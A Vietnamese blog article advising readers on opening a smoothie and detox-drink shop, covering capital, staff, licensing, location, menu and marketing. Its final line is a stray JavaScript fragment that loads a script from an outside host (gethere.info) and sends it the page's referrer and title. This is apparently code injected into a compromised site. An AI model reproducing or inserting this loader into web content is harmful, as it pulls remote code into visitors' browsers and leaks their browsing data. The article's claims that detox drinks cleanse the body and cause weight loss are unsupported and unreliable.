Tư vấn mở quán sinh tố, nước detox từ A đến Z

Nhu cầu sử dụng nước trái cây, nước detox thanh lọc cơ thể, giảm cân dường như ngày càng tăng song nguồn cung cấp hay cụ thể hơn số lượng cửa hàng, quán đồ uống kinh doanh sản phẩm này không nhiều. Rất nhiều chị em phụ nữ, không kể độ tuổi, thậm chí một số đấng mày râu rất quan tâm đến những loại nước ép tốt cho sức khỏe, thanh lọc thải độc và giúp lấy lại vóc dáng cân đối. Chính vì thế, kế hoạch kinh doanh quán sinh tố, nước detox vô cùng khả thi.

tu-van-mo-quan-sinh-to-tu-a-den-z (5)

Trào lưu kinh doanh quán nước sinh tố, ép hoa quả và detox giảm cân dường như phát triển nhiều trong TP. Hồ Chí Minh hơn là ngoài Hà Nội. Tại thị trường miền Bắc cũng bắt đầu “chớm rộ” những quán cà phê hoặc bán online chuyên về sản phẩm này. Phần lớn là các bạn trẻ qua quá trình tìm hiểu những kiến thức về dinh dưỡng, sức khỏe, giảm cân tự pha chế sản phẩm tại nhà nhưng quy mô và hình thức kinh doanh còn chưa chuyên nghiệp và nhận được sự tin tưởng của người dùng do những sản phẩm này đánh vào sức khỏe, sắc đẹp là chủ yếu nên nhiều người còn dè chừng với một số sản phẩm không rõ nguồn gốc trên thị trường.

Song không vì thế mà mảng kinh doanh này kém màu mỡ với nhiều ứng viên kinh doanh, càng ít người khai thác, càng mới và mạo hiểm thì nguồn lợi nhận được càng đáng kể. Đặc biệt dành cho những bạn trẻ có vốn kinh doanh thấp, chung vốn kinh doanh nhưng không muốn tiếp tục đi vào thị trường đồ ăn vặt đã quá đa dạng, cạnh tranh cao thì kinh doanh nước sinh tố, detox giảm cân là lựa chọn lý tưởng.

tu-van-mo-quan-sinh-to-tu-a-den-z (4)

tu-van-mo-quan-sinh-to-tu-a-den-z (1)

Điều kiện khởi nghiệp:

Vốn đầu tư ban đầu từ 50 triệu trở lên, được đầu tư cho

 • Đặt cọc thuê mặt bằng và chi phí sửa chữa cũng cần được tính đến;
 • Trang bị bàn ghế, tủ kệ; một số mua mới, một số tận dụng lại đồ cũ có thể giúp bạn tiết kiệm chi phí ban đầu;
 • Các thiết bị, công cụ, dụng cụ: máy xay sinh tố, máy ép trái cây, máy xay đá bào, tủ mát, ly và dụng cụ các loại…;
 • Vốn dự phòng cho ít nhất 3 tháng đầu kinh doanh

Con người

Bạn cần tuyển những vị trí chủ chốt, tính thật kỹ nguồn lực để tránh gây lãng phí:

 • 1 giám sát (vị trí này bạn có thể đảm nhận luôn nếu muốn tiết kiệm chi phí);
 • 1 thu ngân;
 • 1 nhân viên pha chế;
 • Từ 2 – 3 nhân viên phục vụ, sau này có thể tuyển thêm nhân viên tùy theo sự phát triển quy mô của quán.

Là người khởi nghiệp trong lĩnh vực này, bạn cần nghiên cứu kỹ về các loại trái cây và cách bảo quản, xử lý chúng đúng tiêu chuẩn; một số có thể chế biến trước, song một số chỉ khi bắt tay vào pha chế mới được chế biến. Tất cả cần phải được tìm hiểu kỹ lưỡng để tránh xảy ra sai sót không đáng có. Đặc biệt hơn, bạn cần nắm vững về kiến thức sức khỏe, sắc đẹp; ứng với mỗi loại trái cây, rau củ là vitamin gì, có tác dụng ra sao và khi kết hợp với nhau sẽ ra loại đồ uống như thế nào.

tu-van-mo-quan-sinh-to-tu-a-den-z (2)

Muốn bán được hàng và trụ vững trong một ngành kinh doanh mới, bạn cần lấy được sự tin tưởng từ khách hàng, đặc biệt là những khách hàng đầu tiên, bởi họ có thể là kênh quảng cáo miễn phí, giúp bạn PR cửa hàng của chính mình, vô cùng hữu hiệu.

Một số chủ quán muốn nhận được sự quan tâm của khách hàng trẻ, đặc biệt là các bạn nữ, luôn chú trọn và tập trung vào những loại đồ uống cho màu sắc đẹp mắt từ hồng, đỏ, xanh lá,…và không quên nghĩ ra cho chúng những cái tên cực kỳ ấn tượng. Điều này phụ thuộc vào khả năng sáng tạo và sự tưởng tượng phong phú của bạn.

Pháp lý

Sau khi đã có được mặt bằng, bạn cần đến phường, xã nơi bạn định mở quán làm giấy phép kinh doanh. Hình thức kinh doanh này chỉ đóng thuế khoán dưới mô hình Hộ kinh doanh cá thể.

Công tác chuẩn bị

 • Cần tìm hiểu và liên hệ trước với những nhà cung cấp nguyên vật liệu: trái cây, đá viên, cơ sở sản xuất bàn ghế, vật dụng trang trí cho quán… Học hỏi kinh nghiệm từ những người đã từng kinh doanh hình thức này từ những mối quen biết của bạn, đây là một điều rất quan trọng giúp bạn có thể tránh những sai sót trước đây của họ trong quá trình khởi nghiệp kinh doanh.
 • Nghiên cứu kỹ về địa điểm kinh doanh (nằm ở quận/huyện nào, mức sống thế nào, trục đường có thuận lợi, phía trước quán có dễ dừng xe lại hay không…) Nếu có thể lựa chọn địa điểm nằm gần trường học, siêu thị, Trung tâm thương mại, công ty… sẽ là lợi thế kinh doanh.
 • Thời điểm khởi nghiệp: nên dự tính khởi nghiệp vào những tháng hè để việc kinh doanh của bạn có nhiều thuận lợi hơn.
 • Lên menu: các món sinh tố, món nước ép, trái cây tươi dằm, pha chế được pha chế tốt để đem lại hương vị khác biệt so với các quán khác…
 • Lập 1 bản chi tiết những thứ cần mua và cả phương án thay thế.
 • Lên kế hoạch về marketing (băng rôn, tờ rơi, quảng cáo, kế hoạch tuyển dụng nhân viên và phương án quản lý kinh doanh chi tiết (quản lý nguyên vật liệu đầu vào, quản lý thu ngân, điều hành nhân viên) phương án vận hành bộ máy kinh doanh cụ thể từ giữ xe, phục vụ viên, phương thức thu ngân…

tu-van-mo-quan-sinh-to-tu-a-den-z (1)

Chú ý đối với những sản phẩm nước trái cây thông thường, chỉ sử dụng 1 – 2 loại hoa quả kèm sữa hay đường; detox là loại đồ uống phức tạp hơn nhiều, khi kết hợp 4 – 7 loại hoa quả lẫn rau gia vị để tạo thành một hỗn hợp nước có tác dụng thanh lọc cơ thể, giảm béo, giải nhiệt,…Đặc biệt là sản phẩm này sử dụng không cần kèm thêm bất kỳ loại thức ăn nào.

Loại đồ uống này sử dụng đều đặn, thường xuyên nên những người kinh doanh mặt hàng này có một lượng khách hàng khá ổn định với mức doanh thu tương đối cao, từ 50.000 – 80.000 đồng/chai; tùy thành phần. Bạn cũng nên tính đến dịch vụ ship hàng thay vì để khách hàng chủ động đến cửa hàng; như vậy, sẽ thu hút được nhiều khách hàng hơn.

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;